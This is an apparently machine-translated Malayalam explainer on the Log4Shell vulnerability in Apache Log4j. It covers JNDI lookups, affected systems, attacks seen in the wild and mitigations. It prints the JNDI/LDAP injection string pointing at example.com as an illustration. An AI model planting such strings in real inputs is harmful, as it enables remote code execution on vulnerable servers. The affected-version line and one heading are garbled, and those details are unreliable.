ഉള്ളടക്ക പട്ടിക[മറയ്ക്കുക][കാണിക്കുക]
2021 നവംബർ അവസാനത്തോടെ, സൈബർ സുരക്ഷയ്ക്കുള്ള ഒരു വലിയ ഭീഷണി ഞങ്ങൾ കണ്ടെത്തി. ഈ ചൂഷണം ലോകമെമ്പാടുമുള്ള ദശലക്ഷക്കണക്കിന് കമ്പ്യൂട്ടർ സിസ്റ്റങ്ങളെ ബാധിക്കാൻ സാധ്യതയുണ്ട്.
ഇത് Log4j അപകടസാധ്യതയെ കുറിച്ചുള്ള ഒരു വഴികാട്ടിയാണ്, എങ്ങനെ അവഗണിക്കപ്പെട്ട ഡിസൈൻ പിഴവ് ലോകത്തെ 90% കമ്പ്യൂട്ടർ സേവനങ്ങളും ആക്രമണത്തിന് തുറന്നുകൊടുക്കുന്നു.
അപ്പാച്ചെ സോഫ്റ്റ്വെയർ ഫൗണ്ടേഷൻ വികസിപ്പിച്ചെടുത്ത ഒരു ഓപ്പൺ സോഴ്സ് ജാവ അടിസ്ഥാനമാക്കിയുള്ള ലോഗിംഗ് യൂട്ടിലിറ്റിയാണ് Apache Log4j. 2001-ൽ സെക്കി ഗുൽക്യു എഴുതിയതാണ്, ഇത് ഇപ്പോൾ അപ്പാച്ചെ സോഫ്റ്റ്വെയർ ഫൗണ്ടേഷന്റെ പ്രോജക്റ്റായ അപ്പാച്ചെ ലോഗ്ഗിംഗ് സർവീസസിന്റെ ഭാഗമാണ്.
ലോകമെമ്പാടുമുള്ള കമ്പനികൾ അവരുടെ ആപ്ലിക്കേഷനുകളിൽ ലോഗിംഗ് പ്രവർത്തനക്ഷമമാക്കാൻ Log4j ലൈബ്രറി ഉപയോഗിക്കുന്നു. വാസ്തവത്തിൽ, ജാവ ലൈബ്രറി വളരെ സർവ്വവ്യാപിയാണ്, ആമസോൺ, മൈക്രോസോഫ്റ്റ്, ഗൂഗിൾ എന്നിവയിൽ നിന്നും മറ്റും നിങ്ങൾക്ക് അത് കണ്ടെത്താനാകും.
ലൈബ്രറിയുടെ പ്രാധാന്യം അർത്ഥമാക്കുന്നത്, കോഡിലെ ഏതെങ്കിലും പോരായ്മ ദശലക്ഷക്കണക്കിന് കമ്പ്യൂട്ടറുകളെ ഹാക്കിംഗിന് തുറന്നുകൊടുക്കും എന്നാണ്. 24 നവംബർ 2021-ന്, എ ക്ലൗഡ് സുരക്ഷ ആലിബാബയ്ക്കുവേണ്ടി പ്രവർത്തിക്കുന്ന ഗവേഷകൻ ഭയങ്കരമായ ഒരു പോരായ്മ കണ്ടെത്തി.
Log4Shell എന്നും അറിയപ്പെടുന്ന Log4j കേടുപാടുകൾ 2013 മുതൽ ശ്രദ്ധിക്കപ്പെടാതെ നിലനിന്നിരുന്നു. Log4j പ്രവർത്തിക്കുന്ന ബാധിത സിസ്റ്റങ്ങളിൽ കോഡ് പ്രവർത്തിപ്പിക്കാൻ ഈ അപകടസാധ്യത ക്ഷുദ്ര അഭിനേതാക്കളെ അനുവദിച്ചു. 9 ഡിസംബർ 2021-ന് ഇത് പരസ്യമായി വെളിപ്പെടുത്തി
വ്യവസായ വിദഗ്ധർ Log4Shell ന്യൂനതയെ വിളിക്കുന്നു സമീപകാല മെമ്മറിയിലെ ഏറ്റവും വലിയ അപകടസാധ്യത.
അപകടസാധ്യത പ്രസിദ്ധീകരിച്ചതിന് ശേഷമുള്ള ആഴ്ചയിൽ, സൈബർ സുരക്ഷാ ടീമുകൾ ദശലക്ഷക്കണക്കിന് ആക്രമണങ്ങൾ കണ്ടെത്തി. ചില ഗവേഷകർ മിനിറ്റിൽ നൂറിലധികം ആക്രമണങ്ങളുടെ നിരക്ക് പോലും നിരീക്ഷിച്ചു.
അതെങ്ങനെയാണ് പ്രവര്ത്തിക്കുന്നത്?
Log4Shell വളരെ അപകടകരമാകുന്നത് എന്തുകൊണ്ടാണെന്ന് മനസിലാക്കാൻ, അതിന്റെ കഴിവ് എന്താണെന്ന് നമ്മൾ മനസ്സിലാക്കേണ്ടതുണ്ട്.
Log4Shell കേടുപാടുകൾ ഏകപക്ഷീയമായ കോഡ് നിർവ്വഹണത്തിന് അനുവദിക്കുന്നു, അടിസ്ഥാനപരമായി ഒരു ആക്രമണകാരിക്ക് ഒരു ടാർഗെറ്റ് മെഷീനിൽ ഏത് കമാൻഡും കോഡും പ്രവർത്തിപ്പിക്കാൻ കഴിയും എന്നാണ്.
ഇത് എങ്ങനെയാണ് ഇത് നിറവേറ്റുന്നത്?
ആദ്യം, ജെഎൻഡിഐ എന്താണെന്ന് മനസ്സിലാക്കേണ്ടതുണ്ട്.
ജാവ നെയിമിംഗ് ആന്റ് ഡയറക്ടറി ഇന്റർഫേസ് (ജെഎൻഡിഐ) എന്നത് ജാവ പ്രോഗ്രാമുകളെ ഒരു പേരിലൂടെ ഡാറ്റയും റിസോഴ്സുകളും കണ്ടെത്താനും തിരയാനും അനുവദിക്കുന്ന ഒരു ജാവ സേവനമാണ്. ഈ ഡയറക്ടറി സേവനങ്ങൾ പ്രധാനമാണ്, കാരണം അവ ആപ്ലിക്കേഷനുകൾ സൃഷ്ടിക്കുമ്പോൾ ഡവലപ്പർമാർക്ക് എളുപ്പത്തിൽ റഫറൻസ് ചെയ്യുന്നതിനായി ഒരു സംഘടിത റെക്കോർഡുകൾ നൽകുന്നു.
ഒരു നിശ്ചിത ഡയറക്ടറി ആക്സസ് ചെയ്യാൻ JNDI-ക്ക് വിവിധ പ്രോട്ടോക്കോളുകൾ ഉപയോഗിക്കാം. ഈ പ്രോട്ടോക്കോളുകളിൽ ഒന്നാണ് ലൈറ്റ്വെയ്റ്റ് ഡയറക്ടറി ആക്സസ് പ്രോട്ടോക്കോൾ അല്ലെങ്കിൽ എൽഡിഎപി.
ഒരു സ്ട്രിംഗ് ലോഗ് ചെയ്യുമ്പോൾ, ലോഗ്4ജെ ഫോമിന്റെ എക്സ്പ്രഷനുകൾ നേരിടുമ്പോൾ സ്ട്രിംഗ് സബ്സ്റ്റിറ്റ്യൂഷനുകൾ നടത്തുന്നു ${prefix:name}
.
ഉദാഹരണത്തിന്, Text: ${java:version}
ടെക്സ്റ്റായി ലോഗിൻ ചെയ്തേക്കാം: ജാവ പതിപ്പ് 1.8.0_65. ഇത്തരത്തിലുള്ള പകരം വയ്ക്കലുകൾ സാധാരണമാണ്.
തുടങ്ങിയ പ്രയോഗങ്ങളും നമുക്കുണ്ടാകാം Text: ${jndi:ldap://example.com/file}
LDAP പ്രോട്ടോക്കോൾ വഴി ഒരു URL-ൽ നിന്ന് ഒരു Java ഒബ്ജക്റ്റ് ലോഡ് ചെയ്യാൻ JNDI സിസ്റ്റം ഉപയോഗിക്കുന്നു.
ഇത് ആ URL-ൽ നിന്ന് വരുന്ന ഡാറ്റയെ മെഷീനിലേക്ക് ഫലപ്രദമായി ലോഡ് ചെയ്യുന്നു. ഏതൊരു ഹാക്കർക്കും ഒരു പൊതു URL-ൽ ക്ഷുദ്രകരമായ കോഡ് ഹോസ്റ്റ് ചെയ്യാനും Log4j ഉപയോഗിക്കുന്ന മെഷീനുകൾ ലോഗ് ചെയ്യുന്നതിനായി കാത്തിരിക്കാനും കഴിയും.
ലോഗ് സന്ദേശങ്ങളുടെ ഉള്ളടക്കത്തിൽ ഉപയോക്തൃ നിയന്ത്രിത ഡാറ്റ അടങ്ങിയിരിക്കുന്നതിനാൽ, ഹാക്കർമാർക്ക് അവർ നിയന്ത്രിക്കുന്ന LDAP സെർവറുകളിലേക്ക് പോയിന്റ് ചെയ്യുന്ന സ്വന്തം JNDI റഫറൻസുകൾ ചേർക്കാൻ കഴിയും. ഈ എൽഡിഎപി സെർവറുകൾ ക്ഷുദ്രകരമായ ജാവ ഒബ്ജക്റ്റുകൾ കൊണ്ട് നിറഞ്ഞിരിക്കാം, അത് ജെഎൻഡിഐക്ക് അപകടസാധ്യതയിലൂടെ നടപ്പിലാക്കാൻ കഴിയും.
ആപ്ലിക്കേഷൻ സെർവർ സൈഡാണോ ക്ലയന്റ് സൈഡ് ആപ്ലിക്കേഷനാണോ എന്നത് പ്രശ്നമല്ല എന്നതാണ് ഇതിനെ കൂടുതൽ വഷളാക്കുന്നത്.
ആക്രമണകാരിയുടെ ക്ഷുദ്ര കോഡ് വായിക്കാൻ ലോഗ്ഗറിന് ഒരു മാർഗമുള്ളിടത്തോളം, ആപ്ലിക്കേഷൻ ഇപ്പോഴും ചൂഷണങ്ങൾക്കായി തുറന്നിരിക്കും.
ആരെയാണ് ബാധിക്കുന്നത്?
4 വരെയുള്ള പതിപ്പുകൾ 2.0 ഉള്ളതും APache Log2.14.1j ഉപയോഗിക്കുന്നതുമായ എല്ലാ സിസ്റ്റങ്ങളെയും സേവനങ്ങളെയും ഈ അപകടസാധ്യത ബാധിക്കുന്നു.
ജാവ ഉപയോഗിക്കുന്ന നിരവധി ആപ്ലിക്കേഷനുകളെ ഈ അപകടസാധ്യത ബാധിച്ചേക്കാമെന്ന് നിരവധി സുരക്ഷാ വിദഗ്ധർ ഉപദേശിക്കുന്നു.
മൈക്രോസോഫ്റ്റിന്റെ ഉടമസ്ഥതയിലുള്ള Minecraft വീഡിയോ ഗെയിമിലാണ് ഈ പിഴവ് ആദ്യം കണ്ടെത്തിയത്. ഏതെങ്കിലും അപകടസാധ്യത തടയുന്നതിന് അവരുടെ ജാവ പതിപ്പ് Minecraft സോഫ്റ്റ്വെയർ അപ്ഗ്രേഡ് ചെയ്യാൻ Microsoft അവരുടെ ഉപയോക്താക്കളോട് അഭ്യർത്ഥിച്ചു.
വെണ്ടർമാർക്കുണ്ടെന്ന് സൈബർ സെക്യൂരിറ്റി ആൻഡ് ഇൻഫ്രാസ്ട്രക്ചർ സെക്യൂരിറ്റി ഏജൻസി (സിഐഎസ്എ) ഡയറക്ടർ ജെൻ ഈസ്റ്റർലി പറയുന്നു. പ്രധാന ഉത്തരവാദിത്തം ഈ അപകടസാധ്യത മുതലെടുക്കുന്ന ക്ഷുദ്ര അഭിനേതാക്കളിൽ നിന്ന് അന്തിമ ഉപയോക്താക്കളെ തടയുന്നതിന്.
"ഉപയോക്താക്കൾക്ക് അവരുടെ ഉൽപ്പന്നത്തിൽ ഈ കേടുപാടുകൾ ഉണ്ടെന്നും സോഫ്റ്റ്വെയർ അപ്ഡേറ്റുകൾക്ക് മുൻഗണന നൽകണമെന്നും ഉറപ്പാക്കാൻ വെണ്ടർമാർ അവരുടെ ഉപഭോക്താക്കളുമായി ആശയവിനിമയം നടത്തുകയും വേണം."
ആക്രമണങ്ങൾ ഇതിനകം ആരംഭിച്ചതായാണ് റിപ്പോർട്ട്. സൈബർ സുരക്ഷാ സോഫ്റ്റ്വെയർ നൽകുന്ന കമ്പനിയായ സിമാൻടെക് നിരവധി ആക്രമണ അഭ്യർത്ഥനകൾ നിരീക്ഷിച്ചു.
ഗവേഷകർ കണ്ടെത്തിയ ആക്രമണ തരങ്ങളുടെ ചില ഉദാഹരണങ്ങൾ ഇതാ:
- ഇനേബ്ളര്
ഒരു ആക്രമണകാരിയുടെ നിയന്ത്രണത്തിലുള്ള കമ്പ്യൂട്ടറുകളുടെ ഒരു ശൃംഖലയാണ് ബോട്ട്നെറ്റുകൾ. DDoS ആക്രമണങ്ങൾ നടത്താനും ഡാറ്റ മോഷ്ടിക്കാനും മറ്റ് അഴിമതികൾ നടത്താനും അവർ സഹായിക്കുന്നു. Log4j എക്സ്പ്ലോയിറ്റിൽ നിന്ന് ഡൗൺലോഡ് ചെയ്ത ഷെൽ സ്ക്രിപ്റ്റുകളിൽ മുഹ്സ്റ്റിക് ബോട്ട്നെറ്റ് ഗവേഷകർ നിരീക്ഷിച്ചു.
- XMRig മൈനർ ട്രോജൻ
മോനേറോ ടോക്കൺ ഖനനം ചെയ്യാൻ CPU-കൾ ഉപയോഗിക്കുന്ന ഒരു ഓപ്പൺ സോഴ്സ് ക്രിപ്റ്റോകറൻസി മൈനറാണ് XMRig. സൈബർ കുറ്റവാളികൾക്ക് ആളുകളുടെ ഉപകരണങ്ങളിൽ XMRig ഇൻസ്റ്റാൾ ചെയ്യാൻ കഴിയും, അതിലൂടെ അവർക്ക് അവരുടെ അറിവില്ലാതെ അവരുടെ പ്രോസസ്സിംഗ് പവർ ഉപയോഗിക്കാനാകും.
- ഖോൺസാരി റാൻസംവെയർ
Ransomware എന്നത് രൂപകൽപ്പന ചെയ്തിരിക്കുന്ന ക്ഷുദ്രവെയറിന്റെ ഒരു രൂപത്തെ സൂചിപ്പിക്കുന്നു ഫയലുകൾ എൻക്രിപ്റ്റ് ചെയ്യുക ഒരു കമ്പ്യൂട്ടറിൽ. എൻക്രിപ്റ്റ് ചെയ്ത ഫയലുകളിലേക്ക് ആക്സസ് തിരികെ നൽകുന്നതിന് പകരമായി ആക്രമണകാരികൾക്ക് പണം ആവശ്യപ്പെടാം. Log4Shell ആക്രമണങ്ങളിൽ ഗവേഷകർ ഖോൺസാരി റാൻസംവെയർ കണ്ടെത്തി. അവർ വിൻഡോസ് സെർവറുകൾ ടാർഗെറ്റ് ചെയ്യുകയും .NET ഫ്രെയിംവർക്ക് ഉപയോഗിക്കുകയും ചെയ്യുന്നു.
ഇനി എന്ത് സംഭവിക്കും?
Log4J കേടുപാടുകൾ വരുത്തിയ കുഴപ്പങ്ങൾ പൂർണ്ണമായും പരിഹരിക്കാൻ മാസങ്ങളോ ഒരുപക്ഷേ വർഷങ്ങളോ എടുത്തേക്കാമെന്ന് വിദഗ്ധർ പ്രവചിക്കുന്നു.
ഈ പ്രക്രിയയിൽ ബാധിതമായ എല്ലാ സിസ്റ്റവും ഒരു പാച്ച് ചെയ്ത പതിപ്പ് ഉപയോഗിച്ച് അപ്ഡേറ്റ് ചെയ്യുന്നത് ഉൾപ്പെടുന്നു. ഈ സംവിധാനങ്ങളെല്ലാം പാച്ച് ചെയ്തിട്ടുണ്ടെങ്കിലും, ആക്രമണത്തിനായി സെർവറുകൾ തുറന്നിരിക്കുന്ന വിൻഡോയിലേക്ക് ഹാക്കർമാർ ഇതിനകം ചേർത്തിട്ടുണ്ടാകാവുന്ന പിൻവാതിലുകളുടെ ഭീഷണി ഇപ്പോഴും നിലനിൽക്കുന്നു.
വളരെ പരിഹാരങ്ങളും ലഘൂകരണങ്ങളും ഈ ബഗ് ഉപയോഗിച്ച് ആപ്ലിക്കേഷനുകൾ ചൂഷണം ചെയ്യപ്പെടുന്നത് തടയാൻ നിലവിലുണ്ട്. ഈ അപകടസാധ്യത ലഘൂകരിക്കുന്നതിനായി പുതിയ Log4j പതിപ്പ് 2.15.0-rc1 വിവിധ ക്രമീകരണങ്ങൾ മാറ്റി.
JNDI ഉപയോഗിക്കുന്ന എല്ലാ ഫീച്ചറുകളും ഡിഫോൾട്ടായി പ്രവർത്തനരഹിതമാക്കും കൂടാതെ റിമോട്ട് ലുക്കപ്പുകളും നിയന്ത്രിച്ചിരിക്കുന്നു. നിങ്ങളുടെ Log4j സജ്ജീകരണത്തിലെ ലുക്കപ്പ് ഫീച്ചർ പ്രവർത്തനരഹിതമാക്കുന്നത് സാധ്യമായ ചൂഷണങ്ങളുടെ അപകടസാധ്യത കുറയ്ക്കാൻ സഹായിക്കും.
Log4j-ന് പുറത്ത്, ഓപ്പൺ സോഴ്സ് ചൂഷണം തടയാൻ വിപുലമായ ഒരു പദ്ധതിയുടെ ആവശ്യം ഇപ്പോഴും നിലനിൽക്കുന്നുണ്ട്.
നേരത്തെ മെയ് മാസത്തിൽ വൈറ്റ് ഹൗസ് ഒരു പുറത്തിറക്കിയിരുന്നു എക്സിക്യൂട്ടീവ് ഓർഡർ ദേശീയ സൈബർ സുരക്ഷ മെച്ചപ്പെടുത്താൻ ഇത് ലക്ഷ്യമിടുന്നു. ആപ്ലിക്കേഷൻ നിർമ്മിക്കുന്നതിന് ആവശ്യമായ എല്ലാ ഇനങ്ങളുടെയും ഒരു ലിസ്റ്റ് അടങ്ങുന്ന ഒരു ഔപചാരിക പ്രമാണമായ, മെറ്റീരിയലുകളുടെ ഒരു സോഫ്റ്റ്വെയർ ബില്ലിനുള്ള (SBOM) ഒരു വ്യവസ്ഥ ഇതിൽ ഉൾപ്പെടുന്നു.
തുടങ്ങിയ ഭാഗങ്ങൾ ഇതിൽ ഉൾപ്പെടുന്നു ഓപ്പൺ സോഴ്സ് വികസനത്തിനായി ഉപയോഗിക്കുന്ന പാക്കേജുകൾ, ഡിപൻഡൻസികൾ, എപിഐകൾ. എസ്ബിഒഎമ്മുകളുടെ ആശയം സുതാര്യതയ്ക്ക് സഹായകരമാണെങ്കിലും, അത് ശരിക്കും ഉപഭോക്താവിനെ സഹായിക്കുമോ?
ഡിപൻഡൻസികൾ അപ്ഗ്രേഡുചെയ്യുന്നത് വളരെയധികം ബുദ്ധിമുട്ടുണ്ടാക്കിയേക്കാം. ഇതര പാക്കേജുകൾ കണ്ടെത്തുന്നതിന് അധിക സമയം പാഴാക്കുന്നതിന് പകരം ഏതെങ്കിലും പിഴകൾ അടയ്ക്കാൻ കമ്പനികൾക്ക് തിരഞ്ഞെടുക്കാം. ഒരുപക്ഷേ ഈ SBOM-കൾ അവയാണെങ്കിൽ മാത്രമേ ഉപയോഗപ്രദമാകൂ സ്കോപ്പ് കൂടുതൽ പരിമിതമാണ്.
തീരുമാനം
Log4j പ്രശ്നം ഓർഗനൈസേഷനുകൾക്ക് ഒരു സാങ്കേതിക പ്രശ്നം മാത്രമല്ല.
ബിസിനസ്സ് നേതാക്കൾ അവരുടെ സെർവറുകൾ, ഉൽപ്പന്നങ്ങൾ അല്ലെങ്കിൽ സേവനങ്ങൾ അവർ സ്വയം പരിപാലിക്കാത്ത കോഡിനെ ആശ്രയിക്കുമ്പോൾ സംഭവിക്കാനിടയുള്ള അപകടസാധ്യതകളെക്കുറിച്ച് അറിഞ്ഞിരിക്കണം.
ഓപ്പൺ സോഴ്സ്, തേർഡ് പാർട്ടി ആപ്ലിക്കേഷനുകളെ ആശ്രയിക്കുന്നത് എല്ലായ്പ്പോഴും ചില അപകടസാധ്യതകളോടെയാണ് വരുന്നത്. പുതിയ ഭീഷണികൾ വെളിച്ചത്തുവരുന്നതിന് മുമ്പ് കമ്പനികൾ റിസ്ക് ലഘൂകരണ തന്ത്രങ്ങൾ ആവിഷ്കരിക്കുന്നത് പരിഗണിക്കണം.
ലോകമെമ്പാടുമുള്ള ആയിരക്കണക്കിന് സന്നദ്ധപ്രവർത്തകർ പരിപാലിക്കുന്ന ഓപ്പൺ സോഴ്സ് സോഫ്റ്റ്വെയറിനെയാണ് വെബിന്റെ ഭൂരിഭാഗവും ആശ്രയിക്കുന്നത്.
വെബിനെ ഒരു സുരക്ഷിത സ്ഥലമായി നിലനിർത്താൻ ഞങ്ങൾ ആഗ്രഹിക്കുന്നുവെങ്കിൽ, സർക്കാരുകളും കോർപ്പറേഷനുകളും ഓപ്പൺ സോഴ്സ് ശ്രമങ്ങൾക്കും സൈബർ സുരക്ഷാ ഏജൻസികൾക്കും ധനസഹായം നൽകണം സിസ.
നിങ്ങളുടെ അഭിപ്രായങ്ങൾ രേഖപ്പെടുത്തുക